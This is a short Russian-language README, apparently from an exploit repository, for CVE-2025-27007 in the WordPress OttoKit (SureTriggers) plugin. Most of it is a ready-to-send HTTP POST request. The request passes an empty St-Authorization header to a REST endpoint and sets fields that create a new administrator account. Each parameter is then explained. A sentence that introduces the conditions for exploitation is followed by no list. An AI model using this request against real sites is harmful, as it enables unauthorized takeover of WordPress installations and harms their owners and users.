
эксплуатация CVE-2025-27007, критической уязвимости неаутентифицированного повышения привилегий в плагине WordPress OttoKit (ранее SureTriggers)
Эксплуатация CVE-2025-27007 — критической уязвимости, позволяющей неавторизованному пользователю повысить привилегии в плагине OttoKit (ранее известном как SureTriggers) для WordPress. В этом репозитории описывается, как злоумышленник может создать учётную запись администратора на уязвимом сайте WordPress.
Уязвимость может быть использована при следующих условиях:
Следующий запрос направляется к конечной точке /wp-json/sure-triggers/v1/automation/action для создания учётной записи администратора:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
Конечная точка: POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (пусто): Обход аутентификации, когда плагин не настроен.
selected_options[user_name]: Имя пользователя для новой учётной записи (например, new_admin).
selected_options[user_email]: Электронная почта для новой учётной записи (например, [email protected]).
selected_options[password]: Пароль для новой учётной записи (например, StrongP@ssw0rd123).
selected_options[role]: Установлено значение administrator для предоставления полных привилегий.
type_event: Установлено значение create_user_if_not_exists для запуска создания пользователя.